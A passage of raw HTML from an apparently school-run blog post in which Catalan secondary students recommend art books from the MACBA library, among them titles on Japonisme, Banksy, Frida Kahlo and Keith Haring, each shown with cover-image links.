src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/lbrs282_tapa-La-estetica-nazi_web-193x300.jpg\" alt=\"tapa belleza compulsiva_FINAL\" width=\"193\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/lbrs282_tapa-La-estetica-nazi_web-193x300.jpg 193w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/lbrs282_tapa-La-estetica-nazi_web.jpg 232w\" sizes=\"auto, (max-width: 193px) 100vw, 193px\" \/><\/p><\/blockquote>\n<p>Joana Delmas\u00a0___________________________________________<\/p>\n<blockquote><p>&#8220;JAPONISME. La fascinaci\u00f3 per l\u2019art japon\u00e9s&#8221; de\u00a0l&#8217;Obra Social La Caixa.\u00a0Aquest llibre tracta sobre l\u2019art al Jap\u00f3. Ens parla de com va ser descobert, els seus primers contactes amb occident i la seva fascinaci\u00f3 pels quadres cristians.\u00a0Per l\u2019altre part, tamb\u00e9 ens parla del que va aportar Jap\u00f3 a occident, segles despr\u00e9s, com va influenciar mundialment i a partir d\u2019aquest fet, l\u2019evoluci\u00f3 que va patir.\u00a0Per \u00faltim tamb\u00e9 ens parla de la simbiosi entre el japonisme i el modernisme.<\/p>\n<p>&#8220;\u00cdNDIA MODERNA&#8221;\u00a0Ens explica una mica l\u2019evoluci\u00f3 de l\u2019art hind\u00fa, l\u2019evoluci\u00f3 d\u2019aquest, la colonitzaci\u00f3 brit\u00e0nica, i com aix\u00f2 canvi\u00e0 la seva cultura i art.\u00a0Una vegada arribaren a l\u2019Europa pre-modernista i modernista. Tamb\u00e9 ens explica com era l\u2019aspecte de la fotografia i el cinema. De Gandhi i la situaci\u00f3 a la \u00cdndia.\u00a0A\u00a0poc a poc la \u00cdndia tamb\u00e9 es va anar occidentalitzant i globalitzant.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/img_20160427_140723_1461825996499\/\" rel=\"attachment wp-att-1973\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1973\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140723_1461825996499-232x300.jpg\" alt=\"IMG_20160427_140723_1461825996499\" width=\"232\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140723_1461825996499-232x300.jpg 232w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140723_1461825996499-768x994.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140723_1461825996499-791x1024.jpg 791w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140723_1461825996499.jpg 942w\" sizes=\"auto, (max-width: 232px) 100vw, 232px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/img_20160427_140647_1461825935388\/\" rel=\"attachment wp-att-1974\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1974\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140647_1461825935388-246x300.jpg\" alt=\"IMG_20160427_140647_1461825935388\" width=\"246\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140647_1461825935388-246x300.jpg 246w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140647_1461825935388-768x938.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140647_1461825935388-839x1024.jpg 839w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_20160427_140647_1461825935388.jpg 941w\" sizes=\"auto, (max-width: 246px) 100vw, 246px\" \/><\/a><\/p><\/blockquote>\n<p>Neus \u00c1lvarez ___________________________________________<\/p>\n<blockquote><p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/eugenia_balcells_catalogo_web_01\/\" rel=\"attachment wp-att-2050\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2050\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/eugenia_balcells_catalogo_web_01-300x150.jpg\" alt=\"eugenia_balcells_catalogo_web_01\" width=\"300\" height=\"150\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/eugenia_balcells_catalogo_web_01-300x150.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/eugenia_balcells_catalogo_web_01.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Recomano el\u00a0llibre &#8220;A\u00d1OS LUZ &#8211; LIGHT YEARS&#8221; d\u2019Eug\u00e8nia Balcells, on es poden\u00a0veure molts dels seus treballs sobre efectes visuals.<\/p>\n<p>&#8220;MOVING IMAGE &#8211; IMATGES EN MOVIMENT&#8221;. En aquest llibre, trobem com diferents artistes treballen de manera diferent en les projeccions d\u2019imatges en grans superf\u00edcies.<\/p>\n<p>En el llibre &#8220;DIGITAL ART&#8221;\u00a0hi podem trobar els treballs d\u2019alguns dels artistes m\u00e9s importants de tot el m\u00f3n.<\/p>\n<p>&#8220;PETER KOGLER&#8221; ens mostra l&#8217;evoluci\u00f3\u00a0dels efectes visuals i espaials, imatges en moviment i l\u2019animaci\u00f3 3D de v\u00eddeojocs d\u2019uns artistes des dels anys 60 fins a l\u2019actualitat.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530\/\" rel=\"attachment wp-att-2047\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2047 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530-245x300.jpg\" alt=\"publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530\" width=\"245\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530-245x300.jpg 245w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530-768x940.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530-837x1024.jpg 837w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/publikation-1992-moving-image-electronic-art-imatges-en-moviment-18530.jpg 900w\" sizes=\"auto, (max-width: 245px) 100vw, 245px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/9780500203989_15071\/\" rel=\"attachment wp-att-2048\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2048\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/9780500203989_15071.jpg\" alt=\"9780500203989_15071\" width=\"215\" height=\"300\" \/><\/a>\u00a0 \u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/61fxha9zsql-_sx377_bo1204203200_\/\" rel=\"attachment wp-att-2049\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2049\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/61FXhA9ZSqL._SX377_BO1204203200_-228x300.jpg\" alt=\"61FXhA9ZSqL._SX377_BO1,204,203,200_\" width=\"228\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/61FXhA9ZSqL._SX377_BO1204203200_-228x300.jpg 228w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/61FXhA9ZSqL._SX377_BO1204203200_.jpg 379w\" sizes=\"auto, (max-width: 228px) 100vw, 228px\" \/><\/a><\/p><\/blockquote>\n<p>Valeria Marca ___________________________________________<\/p>\n<blockquote><p>&#8220;POP ART DESIGN&#8221;. Este libro me llam\u00f3 la atenci\u00f3n, porque nos ense\u00f1a los distintos dise\u00f1os de Pop art, fue creado\u00a0por Andrea Warhol, que se pueden aplicar en objetos como sillas, decoraciones, entre otras.\u00a0Vemos como todos podemos imitar el ejemplo de Warhol, de dise\u00f1ar nuestras propias cosas al\u00a0estilo Pop art.<\/p>\n<p>Otra parte por la cual coger\u00eda este libro, es porque los colores son llamativos, agradables a la\u00a0vista, ya que el rojo llama la atenci\u00f3n y lo contrasta con un azul oscuro y otro m\u00e1s claro,\u00a0dinalmente con las letras, estrellas y l\u00edneas blancas. Por lo cu\u00e1l nos podr\u00eda decir que es un libro\u00a0m\u00e1s actual.\u00a0En conclusi\u00f3n, todos tienen la capacidad de juzgar el libro por su portada, y desde mi punto de\u00a0vista, prefiero las portadas de los libros llamativos, que te llamen la atenci\u00f3n de una sola\u00a0mirada.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/pop-art-design\/\" rel=\"attachment wp-att-2046\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2046\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop-art-design-300x297.jpg\" alt=\"pop-art-design\" width=\"300\" height=\"297\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop-art-design-300x297.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop-art-design-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop-art-design.jpg 318w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0 \u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/pop_art_2_klein\/\" rel=\"attachment wp-att-2045\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2045\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop_art_2_klein-300x282.jpg\" alt=\"pop_art_2_klein\" width=\"300\" height=\"282\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop_art_2_klein-300x282.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop_art_2_klein-768x722.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/pop_art_2_klein-1024x963.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p>Jaume Mir\u00f3 ___________________________________________<\/p>\n<blockquote><p>\u2018\u2019JEFF KOONS\u2019\u2019 es un libro fotogr\u00e1fico publicado en 2009 en que hace una recopilaci\u00f3n de\u00a0sus obras m\u00e1s celebres realizado en sus veinticinco a\u00f1os de carrera en m\u00e1s de 50 p\u00e1ginas.\u00a0Recomiendo sin duda este libro porque considero que Koons es una escultor muy\u00a0significativo e ic\u00f3nico de la cultura contempor\u00e1nea y sus coloridas y realistas esculturas\u00a0son dignas de conocer y admirar.<\/p>\n<p>&#8220;ALLEN JONES: Sheer Magic&#8221;\u00a0son una s\u00e9rie de magazines publicados por Allen Jones durante la d\u00e9cada\u00a0de los sesenta en Inglaterra, en estos el escultor y ilustrador muestra bocetos de sus\u00a0obras o ilustraciones completas.\u00a0Recomiendo esta serie de libros ya que adoro a Allen Jones y creo que su estilo poco\u00a0conservador es genial, teniendo en cuenta. adem\u00e1s, que son publicaciones de hace casi\u00a0sesenta a\u00f1os.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/img_2284\/\" rel=\"attachment wp-att-1980\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1980\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2284-300x300.jpg\" alt=\"IMG_2284\" width=\"300\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2284-300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2284-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2284-768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2284-1024x1024.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/img_2287\/\" rel=\"attachment wp-att-1978\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1978\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2287-300x300.jpg\" alt=\"IMG_2287\" width=\"300\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2287-300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2287-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2287-768x768.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/IMG_2287-1024x1024.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p>Cristina Callado ___________________________________________<\/p>\n<blockquote><p>&#8220;CREATE WITH ARTISTS&#8221; te ense\u00f1a c\u00f3mo hacer obras de arte, y c\u00f3mo a mi me\u00a0gustan las manualidades, pens\u00e9 que podria ser chulo.<\/p>\n<p>&#8220;THE DEAD&#8221; Con\u00a0fotografias de personas despu\u00e9s de haber muerto y\u00a0haberse sometido a una aut\u00f3psia.\u00a0Me parece muy interesante porque las imagenes son originales y se salen de lo normal\u00a0ademas el tema de la muerte me parece muy interesante<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/create-with-artists\/\" rel=\"attachment wp-att-2035\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2035\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists-241x300.jpg\" alt=\"create-with-artists\" width=\"241\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists-241x300.jpg 241w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists.jpg 724w\" sizes=\"auto, (max-width: 241px) 100vw, 241px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/create-with-artists-an-art-activity-book-for-every-one-2\/\" rel=\"attachment wp-att-2036\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2036\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists-an-art-activity-book-for-every-one-2-241x300.jpg\" alt=\"create-with-artists-an-art-activity-book-for-every-one-2\" width=\"241\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists-an-art-activity-book-for-every-one-2-241x300.jpg 241w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/create-with-artists-an-art-activity-book-for-every-one-2.jpg 642w\" sizes=\"auto, (max-width: 241px) 100vw, 241px\" \/><\/a><\/p><\/blockquote>\n<p>Kimberly Romero ___________________________________________<\/p>\n<blockquote><p>&#8220;OTROS CREADORES&#8221; &#8211; Once.\u00a0\u00c9s un llibre amb una recopilaci\u00f3 d\u2019obres d&#8217;artistes amb discapacitat visual greu, passant de quadres a escultures, tota mena d&#8217;arts pl\u00e0stiques.Et diu el nom de l\u2019artista i la malaltia que pateix. \u00c9s molt interessant ja que pots veure les seves obres segons la malaltia que tinguin i sobre tot, \u00e9s molt curi\u00f3s pel missatge que volen transmetre.<\/p>\n<p>&#8220;IRINIAN PHOTGRAPHY NOW&#8221; &#8211; Edited by Rose Issa.\u00a0\u00c9s un llibre de fotografia com b\u00e9 diu el t\u00edtol, son imatges d&#8217;Iran que ens mostren la situaci\u00f3 actual d\u2019aquest pa\u00eds, el conflicte, la mort, el patiment de les persones, la desigualtat, el paper de les dones&#8230;. Una barreja de tot, com tot tipus d&#8217;expressions\/sentiment\/situacions que passen les persones que han habitat i encara habiten all\u00e0.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/iranian-photography-now-cover\/\" rel=\"attachment wp-att-2052\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2052\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Iranian-Photography-Now-cover-300x300.jpg\" alt=\"Iranian Photography Now - cover\" width=\"300\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Iranian-Photography-Now-cover-300x300.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Iranian-Photography-Now-cover-150x150.jpg 150w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Iranian-Photography-Now-cover.jpg 500w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p>Sofia Garcia ___________________________________________<\/p>\n<blockquote><p>&#8220;BANKSY &#8211; WALL AND PIECE&#8221; Nos presenta una recopilaci\u00f3n de obras realizadas por el artista an\u00f3nimo Banksy, quien es el autor de este. Personalmente, he escogido este libro porque la manera en la que este artista ha llegado a ser un personaje destacado en el mundo del arte me resulta muy fascinante.<\/p>\n<p>&#8220;KEITH HARING &#8211; I wish I didn\u2019t have to sleep!&#8221; En \u00e9l,\u00a0vemos las reacciones de unos ni\u00f1os a los dibujos de Keith Haring y los resultados que hay en \u00e9l, son totalmente \u201cimpredecibles\u201d. Tambi\u00e9n se ve c\u00f3mo era la t\u00e9cnica de Haring respecto a su gran creatividad, este libro lo veo muy recomendable para todas las edades.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/184252\/\" rel=\"attachment wp-att-2000\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2000\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184252-284x300.jpg\" alt=\"184252\" width=\"284\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184252-284x300.jpg 284w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184252-768x812.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184252-968x1024.jpg 968w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184252.jpg 992w\" sizes=\"auto, (max-width: 284px) 100vw, 284px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/184246\/\" rel=\"attachment wp-att-2001\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2001\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184246-254x300.jpg\" alt=\"184246\" width=\"254\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184246-254x300.jpg 254w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184246-768x908.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184246-866x1024.jpg 866w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/184246.jpg 992w\" sizes=\"auto, (max-width: 254px) 100vw, 254px\" \/><\/a><\/p><\/blockquote>\n<p>Diana del Rio ___________________________________________<\/p>\n<blockquote><p>&#8220;EL DIARIO DE FRIDA KAHLO&#8221;.\u00a0Frida Kahlo va ser una pintora i poeta mexicana. Casada amb el muralista Diego Rivera. La seva vida va estar marcada per una greu malaltia\u00a0que va provocar que estigues al llit durant un llarg temps i el patiment de 32 operacions. Portava una vida poc convencional ja que era bisexual. La majoria de les seves obres es basen amb la seva biografia i el seu patiment. T\u00e9 unes 200 obres on predominen els autoretrats.<\/p>\n<p>El llibre il\u00b7lustrat narra els deu \u00faltims anys de la vida turbulenta de Frida Kahlo. Es veure reflexats diferents aspectes secrets de l\u2019artista que havien estat guardats durant d\u00e8cades. Al Diari de 149 pagines es un recull dente els anys 1944-1954. Recull els pensaments, els poemes i els somnis de Frida i a la vegada parla sobre la t\u00f2xica relaci\u00f3 que va mantenir amb l\u2019artista Diego Rivera.<\/p>\n<p>Recomano aquest llibre ja que parla sobre una artista Mexicana molt importat a la historia de la pintura no nom\u00e9s en l&#8217;\u00e0mbit art\u00edstic sin\u00f3 psicol\u00f2gic ja que la vida d\u2019aquesta senyora va ser una vida complicada i molt interessant degut a la seva valentia.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/618g7mxo2l-_sx325_bo1204203200_\/\" rel=\"attachment wp-att-2054\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2054\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/618G7mXO2L._SX325_BO1204203200_-197x300.jpg\" alt=\"618G7+mXO2L._SX325_BO1,204,203,200_\" width=\"197\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/618G7mXO2L._SX325_BO1204203200_-197x300.jpg 197w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/618G7mXO2L._SX325_BO1204203200_.jpg 327w\" sizes=\"auto, (max-width: 197px) 100vw, 197px\" \/><\/a><\/p><\/blockquote>\n<p>Alnmendra Carrasco ___________________________________________<\/p>\n<blockquote><p>&#8220;THE NUDE\u00a0Ideal and Real&#8221;. Recomano aquest llibre de fotografia de nuus, perqu\u00e8 \u00e9s un tipus de fotografia que m&#8217;interessa molt, considero que es un gran llibre ja que en ell es pot veure i aprendre molt no nom\u00e9s sobre com el cos respon a la llum i viceversa, sin\u00f3 de les qualitats que defineixen el seu estil: la composici\u00f3, la delicadesa, la intimitat amb un subjecte hum\u00e0, etc\u00e8tera.<\/p>\n<p>&#8220;PURPLE FASHION&#8221;.\u00a0Recomano aquesta revista perqu\u00e8 tracta diversos estils, ja no nom\u00e9s en la moda si no les fotografies a models. A mi em donen diferents idees de fotografies atrevides amb un toc de modelatge. Em sembla una revista que presenta moltes games per a escollir, i la varietat d&#8217;artistes que hi presenten es amplia.<\/p><\/blockquote>\n<p>Aina Porta ___________________________________________<\/p>\n<blockquote><p>&#8220;AGITADORS DE CONSCI\u00c8NCIA&#8221; \u00e9s sobre una exposici\u00f3 que es va fer a Alemanya abans de la caiguda del mur de Berl\u00edn per saber com era la vida a Europa.<\/p>\n<p>&#8220;DDR DESIGN&#8221; tracta sobre una exposici\u00f3 de cartells i textos sotmesos a diversos temes d\u2019\u00e0mbit social que ultrapassen les nostres fronteres.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/agitadors-de-consciencia-1\/\" rel=\"attachment wp-att-2029\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2029\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Agitadors-de-consci\u00e8ncia-1-178x300.jpg\" alt=\"Agitadors-de-consci\u00e8ncia-1\" width=\"178\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Agitadors-de-consci\u00e8ncia-1-178x300.jpg 178w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Agitadors-de-consci\u00e8ncia-1-607x1024.jpg 607w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/Agitadors-de-consci\u00e8ncia-1.jpg 725w\" sizes=\"auto, (max-width: 178px) 100vw, 178px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/51gxywyzp2l-_ac_ul320_sr228320_\/\" rel=\"attachment wp-att-2030\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2030\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/51gXyWyzp2L._AC_UL320_SR228320_-214x300.jpg\" alt=\"51gXyWyzp2L._AC_UL320_SR228,320_\" width=\"214\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/51gXyWyzp2L._AC_UL320_SR228320_-214x300.jpg 214w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/51gXyWyzp2L._AC_UL320_SR228320_.jpg 228w\" sizes=\"auto, (max-width: 214px) 100vw, 214px\" \/><\/a><\/p><\/blockquote>\n<p>\u00c0lex Canela\u00a0__(No de la Biblioteca) ___________________________________________<\/p>\n<blockquote><p>T\u00cdTOL: Els viatges de Gulliver,\u00a0AUTOR: Jonathan Swift,\u00a0IL.LUSTRADOR: Guillermo P\u00e9rez Villalta,\u00a0EDITORIAL: Galaxia Gutenberg<\/p>\n<p>Aquesta recomanaci\u00f3 no \u00e9s d&#8217;un llibre pr\u00f2piament art\u00edstic. \u00c9s tracta d&#8217;un cl\u00e0ssic de la literatura\u00a0d&#8217;aventures reeditat i il\u00b7lustrat per Guillermo P\u00e9rez Villalta.\u00a0Aquest llibre corre per casa meva des que s\u00f3c petit i sempre m&#8217;ha agradat veure les seves\u00a0imatges que donen vida d&#8217;;una forma espectacular a la hist\u00f2ria. Cadasc\u00fa es pot imaginar les\u00a0aventures de Gulliver a la seva manera, per\u00f2 la forma amb que P\u00e9rez Villalta les imagina i\u00a0dibuixa no pot ser m\u00e9s completa.\u00a0El llibre cont\u00e9 m\u00e9s de 100 dibuixos que apareixen a l&#8217;inici dels cap\u00edtols o entre mig d&#8217;ells.\u00a0Tamb\u00e9 t\u00e9 tres desplegables que et submergeixen en el m\u00f3n de l&#8217;autor.\u00a0Tots els dibuixos estan plens de detalls, mostren colors vius i perspectives curioses.\u00a0Encara que no t&#8217;agradi molt llegir, quasi b\u00e9 pots entendre tota la hist\u00f2ria a trav\u00e9s de les\u00a0il\u00b7lustracions i fer-te agafar ganes de llegir el text.<\/p>\n<p><a 